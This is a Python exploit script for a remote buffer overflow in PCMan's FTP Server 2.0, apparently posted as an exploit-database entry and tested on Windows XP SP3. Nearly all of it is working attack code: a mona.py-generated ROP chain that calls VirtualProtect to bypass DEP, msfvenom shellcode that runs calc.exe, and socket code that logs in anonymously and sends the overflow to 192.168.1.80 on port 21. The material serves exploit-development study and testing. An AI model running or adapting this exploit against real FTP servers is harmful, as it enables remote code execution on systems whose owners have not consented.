Bypass DEP ( Data Execution Prevention) with ROP (Return-oriented programming )
#!/usr/bin/python
#
#
###################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit (DEP)
# Date: 2019/10/10
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows XP SP3 English
#
# EAX 00000000
# ECX 00000000
# EDX 0000000B
# EBX 00000000
# ESP 0012EDB8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# EBP 00A31C50
# ESI 0012EDC4 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
####################################################################
import socket
import sys
import struct
USER = "anonymous"
PASSWD = "TEST"
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x77c2fb30, # POP ECX # RETN [msvcrt.dll]
0x41414141, # add a 4 bytes data to fit retn 0x4 from the last function's retn before eip=rop_gadgets
0x77c11120, # ptr to &VirtualProtect() [IAT msvcrt.dll]
0x7e41927f, # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll]
0x763cc3d8, # XCHG EAX,ESI # RETN [comdlg32.dll]
0x77c244c6, # POP EBP # RETN [msvcrt.dll]
0x74e331a9, # & jmp esp [RICHED20.dll]
0x7c880176, # POP EAX # RETN [kernel32.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x77e8c784, # NEG EAX # RETN [RPCRT4.dll]
0x7c9059c8, # XCHG EAX,EBX # RETN [ntdll.dll]
0x77c4ded4, # POP EAX # RETN [msvcrt.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x71a7c15c, # NEG EAX # RETN [mswsock.dll] ######
0x7c8409d4, # XCHG EAX,EDX # RETN [kernel32.dll]
0x77c3ea01, # POP ECX # RETN [msvcrt.dll]
0x74e9121e, # &Writable location [RICHED20.dll]
0x77c3aeca, # POP EDI # RETN [msvcrt.dll]
0x74e46463, # RETN (ROP NOP) [RICHED20.dll]
0x77c21d16, # POP EAX # RETN [msvcrt.dll]
0x90909090, # nop
0x77e160c7, # PUSHAD # RETN [ADVAPI32.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
rop_chain = rop_chain.replace('\x00','')
#msfvenom -p windows/exec cmd=calc.exe -b '\x0a\x00\x0d' -f python -v SHELLCODE
SHELLCODE = b""
SHELLCODE += b"\xba\x3e\xfa\x2c\xca\xd9\xc4\xd9\x74\x24\xf4"
SHELLCODE += b"\x5d\x33\xc9\xb1\x31\x83\xed\xfc\x31\x55\x0f"
SHELLCODE += b"\x03\x55\x31\x18\xd9\x36\xa5\x5e\x22\xc7\x35"
SHELLCODE += b"\x3f\xaa\x22\x04\x7f\xc8\x27\x36\x4f\x9a\x6a"
SHELLCODE += b"\xba\x24\xce\x9e\x49\x48\xc7\x91\xfa\xe7\x31"
SHELLCODE += b"\x9f\xfb\x54\x01\xbe\x7f\xa7\x56\x60\xbe\x68"
SHELLCODE += b"\xab\x61\x87\x95\x46\x33\x50\xd1\xf5\xa4\xd5"
SHELLCODE += b"\xaf\xc5\x4f\xa5\x3e\x4e\xb3\x7d\x40\x7f\x62"
SHELLCODE += b"\xf6\x1b\x5f\x84\xdb\x17\xd6\x9e\x38\x1d\xa0"
SHELLCODE += b"\x15\x8a\xe9\x33\xfc\xc3\x12\x9f\xc1\xec\xe0"
SHELLCODE += b"\xe1\x06\xca\x1a\x94\x7e\x29\xa6\xaf\x44\x50"
SHELLCODE += b"\x7c\x25\x5f\xf2\xf7\x9d\xbb\x03\xdb\x78\x4f"
SHELLCODE += b"\x0f\x90\x0f\x17\x13\x27\xc3\x23\x2f\xac\xe2"
SHELLCODE += b"\xe3\xa6\xf6\xc0\x27\xe3\xad\x69\x71\x49\x03"
SHELLCODE += b"\x95\x61\x32\xfc\x33\xe9\xde\xe9\x49\xb0\xb4"
SHELLCODE += b"\xec\xdc\xce\xfa\xef\xde\xd0\xaa\x87\xef\x5b"
SHELLCODE += b"\x25\xdf\xef\x89\x02\x2f\xba\x90\x22\xb8\x63"
SHELLCODE += b"\x41\x77\xa5\x93\xbf\xbb\xd0\x17\x4a\x43\x27"
SHELLCODE += b"\x07\x3f\x46\x63\x8f\xd3\x3a\xfc\x7a\xd4\xe9"
SHELLCODE += b"\xfd\xae\xb7\x6c\x6e\x32\x16\x0b\x16\xd1\x66"
JUNK = "\x41" * 2010
EIP = "\x10\xB3\x45\x7E" # 7E45B310 JMP ESP USER32.DLL
NOP = "\x90" * 4
PADDING = "\x43" * (3000 - len(JUNK) - len(rop_chain) - len(NOP) - len(SHELLCODE))
print len(PADDING)
print("\n\n[+] PCMan's FTP Server 2.0 Rrmote Buffer Overflow Exploit")
print("[+] Version: V2.0")
print("[+] Chako\n\n\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.80",21))
data = s.recv(1024)
print("[-] Login to FTP Server...\n")
s.send("USER " + USER + '\r\n')
data = s.recv(1024)
s.send("PASS " + PASSWD + '\r\n')
data = s.recv(1024)
print("[-] Sending exploit...\n")
#s.send(JUNK + EIP + NOP + SHELLCODE + PADDING + '\r\n')
#s.send(JUNK + "\x44\x44\x44\x44"+rop_chain + NOP + SHELLCODE + PADDING + '\r\n')
s.send(JUNK + rop_chain + NOP + SHELLCODE + PADDING + '\r\n')
s.close()
print("[!] Done! Exploit successfully sent\n")
